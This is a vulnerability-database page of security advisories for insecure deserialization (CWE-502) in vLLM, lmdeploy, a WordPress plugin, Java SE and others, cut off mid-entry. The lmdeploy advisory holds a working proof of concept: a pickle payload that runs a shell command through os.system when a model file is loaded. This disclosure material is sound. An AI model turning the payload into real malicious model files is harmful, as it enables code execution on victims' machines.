Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4798 vulnerabilities reference this CWE, most recent first.

GHSA-9PCC-GVX5-R5WM

Vulnerability from github – Published: 2025-05-06 16:38 – Updated: 2025-12-05 00:14
VLAI
Summary
Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration
Details

Affected Environments

Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.

Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use.

The V1 engine is not affected by this issue.

Impact

In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a SUB ZeroMQ socket and connect to an XPUB socket on the primary vLLM host.

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301

When data is received on this SUB socket, it is deserialized with pickle. This is unsafe, as it can be abused to execute code on a remote machine.

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470

Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.

Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.5.2"
            },
            {
              "fixed": "0.10.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-30165"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-06T16:38:35Z",
    "nvd_published_at": "2025-05-06T17:16:11Z",
    "severity": "HIGH"
  },
  "details": "### Affected Environments\n\nNote that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.\n\nSince V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use.\n\nThe V1 engine is not affected by this issue.\n\n### Impact\n\nIn a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host.\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301\n\nWhen data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine.\n\nhttps://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470\n\nSince the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.\n\nAttackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.",
  "id": "GHSA-9pcc-gvx5-r5wm",
  "modified": "2025-12-05T00:14:53Z",
  "published": "2025-05-06T16:38:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30165"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration"
}

GHSA-9PF3-7RRR-X5JH

Vulnerability from github – Published: 2025-12-26 17:34 – Updated: 2025-12-27 01:08
VLAI
Summary
lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()
Details

Summary

An insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file.

CWE: CWE-502 - Deserialization of Untrusted Data


Details

Several locations in lmdeploy use torch.load() without the recommended weights_only=True security parameter. PyTorch's torch.load() uses Python's pickle module internally, which can execute arbitrary code during deserialization.

Vulnerable Locations

1. lmdeploy/vl/model/utils.py (Line 22)

def load_weight_ckpt(ckpt: str) -> Dict[str, torch.Tensor]:
    """Load checkpoint."""
    if ckpt.endswith('.safetensors'):
        return load_file(ckpt)  # Safe - uses safetensors
    else:
        return torch.load(ckpt)  # ← VULNERABLE: no weights_only=True

2. lmdeploy/turbomind/deploy/loader.py (Line 122)

class PytorchLoader(BaseLoader):
    def items(self):
        params = defaultdict(dict)
        for shard in self.shards:
            misc = {}
            tmp = torch.load(shard, map_location='cpu')  # ← VULNERABLE

Additional vulnerable locations: - lmdeploy/lite/apis/kv_qparams.py:129-130 - lmdeploy/lite/apis/smooth_quant.py:61 - lmdeploy/lite/apis/auto_awq.py:101 - lmdeploy/lite/apis/get_small_sharded_hf.py:41

Note: Secure Pattern Already Exists

The codebase already uses the secure pattern in one location:

# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103
state = torch.load(file, weights_only=True, map_location='cpu')  # ✓ Secure

This shows the fix is already known and can be applied consistently across the codebase.


PoC

Step 1: Create a Malicious Checkpoint File

Save this as create_malicious_checkpoint.py:

#!/usr/bin/env python3
"""
Creates a malicious PyTorch checkpoint that executes code when loaded.
"""
import pickle
import os

class MaliciousPayload:
    """Executes arbitrary code during pickle deserialization."""

    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # This is called during unpickling - returns (callable, args)
        return (os.system, (self.command,))

def create_malicious_checkpoint(output_path, command):
    """Create a malicious checkpoint file."""
    malicious_state_dict = {
        'model.layer.weight': MaliciousPayload(command),
        'config': {'hidden_size': 768}
    }

    with open(output_path, 'wb') as f:
        pickle.dump(malicious_state_dict, f)

    print(f"[+] Created malicious checkpoint: {output_path}")

if __name__ == "__main__":
    os.makedirs("malicious_model", exist_ok=True)
    create_malicious_checkpoint(
        "malicious_model/pytorch_model.bin",
        "echo '[PoC] Arbitrary code executed! - RCE confirmed'"
    )

Step 2: Load the Malicious File (Simulates lmdeploy's Behavior)

Save this as exploit.py:

#!/usr/bin/env python3
"""
Demonstrates the vulnerability by loading the malicious checkpoint.
This simulates what happens when lmdeploy loads an untrusted model.
"""
import pickle

def unsafe_load(path):
    """Simulates torch.load() without weights_only=True."""
    # torch.load() uses pickle internally, so this is equivalent
    with open(path, 'rb') as f:
        return pickle.load(f)

if __name__ == "__main__":
    print("[*] Loading malicious checkpoint...")
    print("[*] This simulates: torch.load(ckpt) in lmdeploy")
    print("-" * 50)

    result = unsafe_load("malicious_model/pytorch_model.bin")

    print("-" * 50)
    print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}")
    print("[!] If you see the PoC message above, RCE is confirmed!")

Step 3: Run the PoC

# Create the malicious checkpoint
python create_malicious_checkpoint.py

# Exploit - triggers code execution
python exploit.py

Expected Output

[+] Created malicious checkpoint: malicious_model/pytorch_model.bin
[*] Loading malicious checkpoint...
[*] This simulates: torch.load(ckpt) in lmdeploy
--------------------------------------------------
[PoC] Arbitrary code executed! - RCE confirmed     ← Code executed here!
--------------------------------------------------
[!] Checkpoint loaded. Keys: ['model.layer.weight', 'config']
[!] If you see the PoC message above, RCE is confirmed!

The [PoC] Arbitrary code executed! message proves that arbitrary shell commands run during deserialization.


Impact

Who Is Affected?

  • All users who load PyTorch model files (.bin, .pt) from untrusted sources
  • This includes models downloaded from HuggingFace, ModelScope, or shared by third parties

Attack Scenario

  1. Attacker creates a malicious model file (e.g., pytorch_model.bin) containing a pickle payload
  2. Attacker distributes it as a "fine-tuned model" on model sharing platforms or directly to victims
  3. Victim downloads and loads the model using lmdeploy
  4. Malicious code executes with the victim's privileges

Potential Consequences

  • Remote Code Execution (RCE) - Full system compromise
  • Data theft - Access to sensitive files, credentials, API keys
  • Lateral movement - Pivot to other systems in cloud environments
  • Cryptomining or ransomware - Malware deployment

Recommended Fix

Add weights_only=True to all torch.load() calls:

# lmdeploy/vl/model/utils.py:22
- return torch.load(ckpt)
+ return torch.load(ckpt, weights_only=True)

# lmdeploy/turbomind/deploy/loader.py:122
- tmp = torch.load(shard, map_location='cpu')
+ tmp = torch.load(shard, map_location='cpu', weights_only=True)

# Apply the same pattern to:
# - lmdeploy/lite/apis/kv_qparams.py:129-130
# - lmdeploy/lite/apis/smooth_quant.py:61
# - lmdeploy/lite/apis/auto_awq.py:101
# - lmdeploy/lite/apis/get_small_sharded_hf.py:41

Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.


Resources

Official PyTorch Security Documentation

"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."

Related CVEs

CVE Description CVSS
CVE-2025-32434 PyTorch torch.load() RCE vulnerability 9.3 Critical
CVE-2024-5452 PyTorch Lightning insecure deserialization 8.8 High

Additional Resources


Thank you for your time reviewing this report. I'm happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.11"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "lmdeploy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-67729"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-26T17:34:08Z",
    "nvd_published_at": "2025-12-26T22:15:52Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAn insecure deserialization vulnerability exists in lmdeploy where `torch.load()` is called without the `weights_only=True` parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious `.bin` or `.pt` model file.\n\n\n**CWE:** CWE-502 - Deserialization of Untrusted Data\n\n---\n\n## Details\n\nSeveral locations in lmdeploy use `torch.load()` without the recommended `weights_only=True` security parameter. PyTorch\u0027s `torch.load()` uses Python\u0027s pickle module internally, which can execute arbitrary code during deserialization.\n\n### Vulnerable Locations\n\n**1. `lmdeploy/vl/model/utils.py` (Line 22)**\n\n```python\ndef load_weight_ckpt(ckpt: str) -\u003e Dict[str, torch.Tensor]:\n    \"\"\"Load checkpoint.\"\"\"\n    if ckpt.endswith(\u0027.safetensors\u0027):\n        return load_file(ckpt)  # Safe - uses safetensors\n    else:\n        return torch.load(ckpt)  # \u2190 VULNERABLE: no weights_only=True\n```\n\n**2. `lmdeploy/turbomind/deploy/loader.py` (Line 122)**\n\n```python\nclass PytorchLoader(BaseLoader):\n    def items(self):\n        params = defaultdict(dict)\n        for shard in self.shards:\n            misc = {}\n            tmp = torch.load(shard, map_location=\u0027cpu\u0027)  # \u2190 VULNERABLE\n```\n\n**Additional vulnerable locations:**\n- `lmdeploy/lite/apis/kv_qparams.py:129-130`\n- `lmdeploy/lite/apis/smooth_quant.py:61`\n- `lmdeploy/lite/apis/auto_awq.py:101`\n- `lmdeploy/lite/apis/get_small_sharded_hf.py:41`\n\n### Note: Secure Pattern Already Exists\n\nThe codebase already uses the secure pattern in one location:\n\n```python\n# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103\nstate = torch.load(file, weights_only=True, map_location=\u0027cpu\u0027)  # \u2713 Secure\n```\n\nThis shows the fix is already known and can be applied consistently across the codebase.\n\n---\n\n## PoC\n\n### Step 1: Create a Malicious Checkpoint File\n\nSave this as `create_malicious_checkpoint.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCreates a malicious PyTorch checkpoint that executes code when loaded.\n\"\"\"\nimport pickle\nimport os\n\nclass MaliciousPayload:\n    \"\"\"Executes arbitrary code during pickle deserialization.\"\"\"\n    \n    def __init__(self, command):\n        self.command = command\n    \n    def __reduce__(self):\n        # This is called during unpickling - returns (callable, args)\n        return (os.system, (self.command,))\n\ndef create_malicious_checkpoint(output_path, command):\n    \"\"\"Create a malicious checkpoint file.\"\"\"\n    malicious_state_dict = {\n        \u0027model.layer.weight\u0027: MaliciousPayload(command),\n        \u0027config\u0027: {\u0027hidden_size\u0027: 768}\n    }\n    \n    with open(output_path, \u0027wb\u0027) as f:\n        pickle.dump(malicious_state_dict, f)\n    \n    print(f\"[+] Created malicious checkpoint: {output_path}\")\n\nif __name__ == \"__main__\":\n    os.makedirs(\"malicious_model\", exist_ok=True)\n    create_malicious_checkpoint(\n        \"malicious_model/pytorch_model.bin\",\n        \"echo \u0027[PoC] Arbitrary code executed! - RCE confirmed\u0027\"\n    )\n```\n\n### Step 2: Load the Malicious File (Simulates lmdeploy\u0027s Behavior)\n\nSave this as `exploit.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nDemonstrates the vulnerability by loading the malicious checkpoint.\nThis simulates what happens when lmdeploy loads an untrusted model.\n\"\"\"\nimport pickle\n\ndef unsafe_load(path):\n    \"\"\"Simulates torch.load() without weights_only=True.\"\"\"\n    # torch.load() uses pickle internally, so this is equivalent\n    with open(path, \u0027rb\u0027) as f:\n        return pickle.load(f)\n\nif __name__ == \"__main__\":\n    print(\"[*] Loading malicious checkpoint...\")\n    print(\"[*] This simulates: torch.load(ckpt) in lmdeploy\")\n    print(\"-\" * 50)\n    \n    result = unsafe_load(\"malicious_model/pytorch_model.bin\")\n    \n    print(\"-\" * 50)\n    print(f\"[!] Checkpoint loaded. Keys: {list(result.keys())}\")\n    print(\"[!] If you see the PoC message above, RCE is confirmed!\")\n```\n\n### Step 3: Run the PoC\n\n```bash\n# Create the malicious checkpoint\npython create_malicious_checkpoint.py\n\n# Exploit - triggers code execution\npython exploit.py\n```\n\n### Expected Output\n\n```\n[+] Created malicious checkpoint: malicious_model/pytorch_model.bin\n[*] Loading malicious checkpoint...\n[*] This simulates: torch.load(ckpt) in lmdeploy\n--------------------------------------------------\n[PoC] Arbitrary code executed! - RCE confirmed     \u2190 Code executed here!\n--------------------------------------------------\n[!] Checkpoint loaded. Keys: [\u0027model.layer.weight\u0027, \u0027config\u0027]\n[!] If you see the PoC message above, RCE is confirmed!\n```\n\nThe `[PoC] Arbitrary code executed!` message proves that arbitrary shell commands run during deserialization.\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- **All users** who load PyTorch model files (`.bin`, `.pt`) from untrusted sources\n- This includes models downloaded from HuggingFace, ModelScope, or shared by third parties\n\n### Attack Scenario\n\n1. Attacker creates a malicious model file (e.g., `pytorch_model.bin`) containing a pickle payload\n2. Attacker distributes it as a \"fine-tuned model\" on model sharing platforms or directly to victims\n3. Victim downloads and loads the model using lmdeploy\n4. Malicious code executes with the victim\u0027s privileges\n\n### Potential Consequences\n\n- **Remote Code Execution (RCE)** - Full system compromise\n- **Data theft** - Access to sensitive files, credentials, API keys\n- **Lateral movement** - Pivot to other systems in cloud environments\n- **Cryptomining or ransomware** - Malware deployment\n\n---\n\n## Recommended Fix\n\nAdd `weights_only=True` to all `torch.load()` calls:\n\n```diff\n# lmdeploy/vl/model/utils.py:22\n- return torch.load(ckpt)\n+ return torch.load(ckpt, weights_only=True)\n\n# lmdeploy/turbomind/deploy/loader.py:122\n- tmp = torch.load(shard, map_location=\u0027cpu\u0027)\n+ tmp = torch.load(shard, map_location=\u0027cpu\u0027, weights_only=True)\n\n# Apply the same pattern to:\n# - lmdeploy/lite/apis/kv_qparams.py:129-130\n# - lmdeploy/lite/apis/smooth_quant.py:61\n# - lmdeploy/lite/apis/auto_awq.py:101\n# - lmdeploy/lite/apis/get_small_sharded_hf.py:41\n```\n\nAlternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.\n\n---\n\n## Resources\n\n### Official PyTorch Security Documentation\n\n- **[PyTorch torch.load() Documentation](https://pytorch.org/docs/stable/generated/torch.load.html)**\n  \n  \u003e *\"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source.\"*\n\n### Related CVEs\n\n| CVE | Description | CVSS |\n|-----|-------------|------|\n| [CVE-2025-32434](https://nvd.nist.gov/vuln/detail/CVE-2025-32434) | PyTorch `torch.load()` RCE vulnerability | **9.3 Critical** |\n| [CVE-2024-5452](https://nvd.nist.gov/vuln/detail/CVE-2024-5452) | PyTorch Lightning insecure deserialization | **8.8 High** |\n\n### Additional Resources\n\n- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- [Trail of Bits: Exploiting ML Pickle Files](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n- [Rapid7: Attackers Weaponizing AI Models](https://www.rapid7.com/blog/post/2024/02/06/attackers-are-weaponizing-ai-model-files/)\n\n---\n\nThank you for your time reviewing this report. I\u0027m happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!",
  "id": "GHSA-9pf3-7rrr-x5jh",
  "modified": "2025-12-27T01:08:38Z",
  "published": "2025-12-26T17:34:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67729"
    },
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/InternLM/lmdeploy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()"
}

GHSA-9PM6-22W2-X4H9

Vulnerability from github – Published: 2025-05-19 03:30 – Updated: 2025-05-19 03:30
VLAI
Details

A vulnerability was found in iop-apl-uw basestation3 up to 3.0.4 and classified as problematic. This issue affects the function load_qc_pickl of the file basestation3/QC.py. The manipulation of the argument qc_file leads to deserialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The code maintainer tagged the issue as closed. But there is no new commit nor release in the GitHub repository available so far.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-4905"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-19T02:15:17Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was found in iop-apl-uw basestation3 up to 3.0.4 and classified as problematic. This issue affects the function load_qc_pickl of the file basestation3/QC.py. The manipulation of the argument qc_file leads to deserialization. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The code maintainer tagged the issue as closed. But there is no new commit nor release in the GitHub repository available so far.",
  "id": "GHSA-9pm6-22w2-x4h9",
  "modified": "2025-05-19T03:30:30Z",
  "published": "2025-05-19T03:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4905"
    },
    {
      "type": "WEB",
      "url": "https://github.com/iop-apl-uw/basestation3/issues/6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/iop-apl-uw/basestation3/issues/6#event-17672013757"
    },
    {
      "type": "WEB",
      "url": "https://github.com/iop-apl-uw/basestation3/issues/6#issue-3066055868"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.309461"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.309461"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.578074"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-9PPP-7G47-4H53

Vulnerability from github – Published: 2026-05-02 06:30 – Updated: 2026-05-02 06:30
VLAI
Details

The Profile Builder Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to and including 3.14.5. This is due to the use of PHP's maybe_unserialize() function on the attacker-controlled 'args' POST parameter within the wppb_request_users_pins_action_callback() AJAX handler, which lacked any nonce verification, type checking, or input validation before deserialization. Because the handler was registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, it was reachable by completely unauthenticated users. This makes it possible for unauthenticated attackers to inject arbitrary PHP objects into application memory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-7647"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-02T06:16:04Z",
    "severity": "HIGH"
  },
  "details": "The Profile Builder Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to and including 3.14.5. This is due to the use of PHP\u0027s maybe_unserialize() function on the attacker-controlled \u0027args\u0027 POST parameter within the wppb_request_users_pins_action_callback() AJAX handler, which lacked any nonce verification, type checking, or input validation before deserialization. Because the handler was registered with both wp_ajax_ and wp_ajax_nopriv_ hooks, it was reachable by completely unauthenticated users. This makes it possible for unauthenticated attackers to inject arbitrary PHP objects into application memory.",
  "id": "GHSA-9ppp-7g47-4h53",
  "modified": "2026-05-02T06:30:24Z",
  "published": "2026-05-02T06:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7647"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L13"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/tags/3.14.5/add-ons/user-listing/one-map-listing.php#L271"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L13"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/profile-builder-pro/trunk/add-ons/user-listing/one-map-listing.php#L271"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7b897f5-f988-4515-83bc-456f041d7e2e?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9Q47-JM86-2C5R

Vulnerability from github – Published: 2022-05-24 17:14 – Updated: 2022-05-24 17:14
VLAI
Details

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-2756"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-04-15T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).",
  "id": "GHSA-9q47-jm86-2c5r",
  "modified": "2022-05-24T17:14:49Z",
  "published": "2022-05-24T17:14:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-2756"
    },
    {
      "type": "WEB",
      "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10332"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00024.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CKAV6KFFAEANXAN73AFTGU7Z6YNRWCXQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L7VHC4EW36KZEIDQ56RPCWBZCQELFFKN"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYHHHZRHXCBGRHGE5UP7UEB4IZ2QX536"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202006-22"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202209-15"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200416-0004"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4337-1"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2020/dsa-4662"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2020/dsa-4668"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00023.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00048.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9Q62-9Q86-V696

Vulnerability from github – Published: 2022-05-14 01:05 – Updated: 2022-05-14 01:05
VLAI
Details

The DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.x before 1.5.17 allows remote attackers to cause a denial of service (infinite loop) and write to, move, and delete files with the permissions of DiskFileItem, and if running on a Java VM before 1.3.1, execute arbitrary code via a crafted serialized Java object.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-6793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-17T13:18:00Z",
    "severity": "CRITICAL"
  },
  "details": "The DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.x before 1.5.17 allows remote attackers to cause a denial of service (infinite loop) and write to, move, and delete files with the permissions of DiskFileItem, and if running on a Java VM before 1.3.1, execute arbitrary code via a crafted serialized Java object.",
  "id": "GHSA-9q62-9q86-v696",
  "modified": "2022-05-14T01:05:31Z",
  "published": "2022-05-14T01:05:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6793"
    },
    {
      "type": "WEB",
      "url": "https://wicket.apache.org/news/2016/12/31/cve-2016-6793.html"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/security/research/tra-2016-23"
    },
    {
      "type": "WEB",
